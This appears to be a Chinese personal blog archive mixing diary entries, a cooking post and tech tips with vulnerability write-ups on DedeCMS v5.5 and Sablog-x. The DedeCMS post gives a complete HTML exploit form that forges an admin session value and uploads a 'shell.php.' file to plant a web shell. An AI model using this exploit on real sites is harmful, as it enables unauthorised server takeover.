Mar 12
唉,最近右眼又开始跳了,每次这个时候一定没什么好事发生吧...
前两天家里租出去的老房子外面的两个电表被别人砸坏了,打了110,好似没啥效果...小失望一下...
手上碰了碰了两三处小伤口,因为一些事和老婆吵了一架,还有N多郁闷的事情..
今天我亲爱的老奶奶也去世了,希望她能够安息,在天国过的一切都好!
本来是打了很多字的,后来想想还是删掉吧,写的太乱了....
人这一辈子活着,生不带来,死不带去.开心也是过,伤心也是过,我是不是活的太累了,是不是该改变一下了?
Mar 9
作者:st0p
转载请注明出处 http://www.st0p.org
今天才从Wolves Security Team看到toby57大牛发布的"DEDECMS v5.5 GBK Final 的一个鸡肋漏洞"这篇文章,原文地址:http://bbs.wolvez.org/topic/125/
自己本地测试了一下,覆盖SESSION这个有点鸡胁才是真的,因为要求session.auto_start = 1的情况下,一般session.auto_start这个是关闭的,所以很鸡胁.不过后面的拿SHELL当你成功进入后台的情况下就能用了..
而且session.auto_start一般是要和session_start()一起用的.查了一下资料,只有在session.auto_start开启的情况下,先调用session_start(),然后才有可能.不过具体杂覆盖的SESSION我还没去看,唉,要真找下去头非晕不可...有空在看吧..
我看了一下,其实GBK和UTF8都存在这个问题,不知道发现这个的大牛为啥只是把标题写了GBK...
看了一下/include/dialog/select_soft_post.php
问题主要出现在手工指定文件名后,更名的部分.当我们的名字为st0p.php.的时候,注意,php后还有个点,就可以跳过验证,看代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | ...... //文件名(前为手工指定, 后者自动处理) if(!empty($newname)) { $filename = $newname; //当我们的新名称为st0p.php.的时候 if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); //当$filename中不含有.的时候调用 else $fs = explode('.', $filename); //当$filename中含有.时调用 if(eregi($cfg_not_allowall, $fs[count($fs)-1])) //$fs[count($fs)-1]得到的值为空,跳过验证 { ShowMsg("你指定的文件名被系统禁止!",'javascript:;'); exit(); } if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1]; } else { $filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme)); $fs = explode('.', $uploadfile_name); if(eregi($cfg_not_allowall, $fs[count($fs)-1])) { ShowMsg("你上传了某些可能存在不安全因素的文件,系统拒绝操作!",'javascript:;'); exit(); } $filename = $filename.'.'.$fs[count($fs)-1]; } $fullfilename = $cfg_basedir.$activepath.'/'.$filename; //嘿嘿,跳过验证,$filename还为st0p.php. $fullfileurl = $activepath.'/'.$filename; move_uploaded_file($uploadfile,$fullfilename) or die("上传文件到 $fullfilename 失败!"); @unlink($uploadfile); ...... |
EXP如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DEDECMS v5.5 Final select_soft_post.php EXP</title>
<script type="text/javascript">
function fsubmit(){
var form = document.forms[0];
form.action = form.target.value + form.path.value;
tmpstr = form.target.value +'/'+ form.newname.value;
form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
form.submit();
}
</script>
<style type="text/css">
<!--
body {
text-align: center;
}
-->
</style>
</head>
<body>
<h3>DEDECMS v5.5 Final select_soft_post.php EXP</h3>
<form action="" method="post" enctype="multipart/form-data">
<p>
<input type="hidden" name="_SESSION[dede_admin_id]" value="1" />
<input type="hidden" name="bkurl" value="1" />
<label>Target:
<input name="target" type="text" id="target" value="http://target" />
</label>
<label>Path:
<input name="path" type="text" id="path" value="/include/dialog/select_soft_post.php" />
</label>
<label>File:
<input type="file" name="uploadfile" id="uploadfile" />
</label>
<label>NewName:
<input name="newname" type="text" id="newname" value="shell.php." />
</label>
<input type="submit" name="button" id="button" value="Fuck" onclick="fsubmit()" />
</p>
</form>
</body>
</html> |
Feb 26
来源:http://www.52crack.com/blog/?action=show&id=487
根本不需要什么身份证明,乱七八糟证明的,你只需确认whois信息里admin的邮箱是你所有的,就OK.
一下内容都建立在这个前提下,否则出现其他后果,自负!
最好用的办法就是到InterNIC 递交你的投诉,地址http://reports.internic.net/cgi/registrars/problem-report.cgi
在这里你只需要填写一下个人信息,还有下面的单选框,选右下角那一个.
Transfer Problems -
Auth Codes
Locked Domain
Fraudulent Transfer
Registrar Denied Transfer
作为消费者的我们一定要勇于维护自己的权益,而不是忍气吞声,这样子只会助纣为虐,让坏人更加嚣张。对于中国的某些域名注册商和代理们我也不用多说了,如果你曾经在转移域名的问题受到过他们的刁难,请一定要到上面这个地址去投诉下他们。
万网:HICHINA ZHICHENG TECHNOLOGY LTD.
新网互联:BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
新网信海:XIN NET TECHNOLOGY CORPORATION
PS:新网信海还算是不错的,我给代理发了邮件,3工作日后,就收到域名转移码了.所以说注册域名找个好代理也很重要.
范文1
Hello,I regesiter xxxx.com and xxxx.com from HICHINA ZHICHENG TECHNOLOGY LTD.
I am not satisfied with their services.And I want to transfer my domains to name.com.
From April 20th,2009,I have do everything as they tell me to do.I have send my goverment ID card copy to them.
And I have given a lot of phones to them.Everytime they say I will receive my auth code soon.But everytime I login in my email-”xxxx@xxxx.com”,I still couldn’t receive the auth codes.
They limited the user transfer the domain particularly seriously.I have waste about one mothes but I still can’t receive my auth code.
Today they want me to wait for 60 days and continu to begin the transfer again.
They don’t give me the auth codes to transfer the domain.Please!Please!Do please help me tarnsfer my domain.HICHINA is a very bad domain registrar.
范文2
This is a Domain Name Complaint letter about HiChina Registrar I send 3nd times. I’m the domain owner of xxxxxx, wanna transfer domains registrar from HiChina (HiChina Zhicheng Technology Limited, www.net.cn) to GoDaddy.com, Inc.
But after I submit information include photocopy of id card & passport and comfirm they recieved (by telephone). HICHINA refuse to processed the transfer, the reason is the application form is not completely. Actually I submit 2 times to meet their request.
First time: Around 23rd, Dec 2008 I sent application form and photocopy of my ID card. They replay me that there is a reqest item i left empty and no signature;
Second time: Around 8th, Feb 2009 I sent application form with signature and completely all item attached photocopy of my passport (by HiChina’s request). But they still refuse with same reason. I don’t know how can I do to meet the request.
I feel that is irresponsible action and it break the iccan domain policy for nosense reason. I need your help.
范文3
To Iccan administrator:
Dear ICCAN administrator,happy new year.
This is a Domain Name Complaint letter about Changing Registrars,I’m the domain owner, wanna tranfer some domain Registrar from HICHINA WEB SOLUTIONS (HONG KONG) LIMITED to enom
(xxx.com,xx.net,xx.com,xx.com,xxxx.com…)
But after i submit ems info to them and confirm they receving(by email and telephone),HICHINA refuse to proceed the process and then have no response.
I feel that’s irresponsible action and it break the iccan domain Policy for nonsense reason.I need your help.
my agent id:xxx,name xxx,thanks a lot.
server info:
Domain Name: xxx
Registrar: HICHINA WEB SOLUTIONS (HONG KONG) LIMITED
Whois Server: grs.hichina.com
Referral URL: http://whois.hichina.com
Feb 21
通过SQL语句导出数据
1 2 | bcp "select * from info..info where date between '2010-02-01' and '2010-02-04'" queryout "d:\info.out" -SST0P-PC\SQLEXPRESS -Usa -P123456 -c |
直接导出数据库表的数据
1 | bcp 库名.dbo.表名 out d:\表名.dat -T -n |
其中-S后的ST0P-PC\SQLEXPRESS是我本地的服务器名称
-U后的是用户名
-p后的是密码
输入bcp/?查看帮助
用法: bcp {dbtable | query} {in | out | queryout | format} 数据文件
[-m 最大错误数] [-f 格式化文件] [-e 错误文件]
[-F 首行] [-L 末行] [-b 批大小]
[-n 本机类型] [-c 字符类型] [-w 宽字符类型]
[-N 将非文本保持为本机类型] [-V 文件格式版本] [-q 带引号的标识符]
[-C 代码页说明符] [-t 字段终止符] [-r 行终止符]
[-i 输入文件] [-o 输出文件] [-a 数据包大小]
[-S 服务器名称] [-U 用户名] [-P 密码]
[-T 可信连接] [-v 版本] [-R 允许使用区域设置]
[-k 保留空值] [-E 保留标识值]
[-h"加载提示"] [-x 生成 xml 格式化文件]
Feb 19
author: 80vul-B
team:http://www.80vul.com
一 描叙:
由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。
二 分析
common.inc.php代码里:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | .... $onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals'); if ($onoff != 1) { @extract($_COOKIE, EXTR_SKIP); @extract($_POST, EXTR_SKIP); @extract($_GET, EXTR_SKIP); } ... $sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']); list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', ''); $sax_hash = sax_addslashes($_COOKIE['sax_hash']); ... $seccode = $sessionexists = 0; if ($sax_hash) { ... if ($_EVO = $DB->fetch_array($query)){ //$_EVO初始化过程在if ($sax_hash)里,如果这个if条件不满足,将跳过这个初始化过程。 ... } if(!$sessionexists) { if($sax_uid) { if(!($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) { ... @extract($_EVO); //覆盖任意变量 |
Feb 5
嘿嘿,想吃肉了,晒晒我自己做的干锅鸡图片。
因为是晚上,光线不好,有的照片用手电筒照了一下,唉,破手机,拍的就是不行。。。
上面这两张是刚炒出来鸡块的时候,很麻辣哦。然后接着加工,加了香菜,蘑菇,木耳,大豆芽,芹菜芽,豆腐叶,芝麻,辣椒。。。边吃边加热,麻辣鲜香,红红的汤,红红的辣椒,绿色的香菜,黄色的大豆芽,黑色的木耳,白色的蘑菇,芝麻,豆腐叶,嘎,还有金黄色的肉。。。好吃啊!
Jan 30
ime-mode
语法:
ime-mode : auto | active | inactive | disabled
取值:
auto : 默认值。不影响IME的状态。与不指定 ime-mode 属性时相同
active : 指定所有使用IME输入的字符。即激活本地语言输入法。用户仍可以撤销激活IME
inactive : 指定所有不使用IME输入的字符。即激活非本地语言。用户仍可以撤销激活IME
disabled : 完全禁用IME。对于有焦点的控件(如输入框),用户不可以激活IME
Jan 18
唉,结婚真累,本来想和老婆出去玩的,不过最近事好像特别多,搞的啥也玩不成了。。
今天去领证了,和想像中不同,服务态度不算好吧,一副爱理不理的样子,好像离婚的比结婚的多。。。
以前见过老爸老妈的是一张纸,现在拿到才知道是两个本本,一人一个。。。
两人合照一寸照片四张 20元
复印身份证 2元
结婚证手续费 9元
共销费31元。以后就不是单身了。。。已婚,好蛋疼的词。。。
最近处理婚后的锁事,把老婆的户口迁过来,接着学习冲电,努力工作赚钱。。
Dec 26
唉,不自动加载的话,用起来相当的麻烦。以下方法很简单。。
sudo apt-get install ntfs-config
sudo ntfs-config
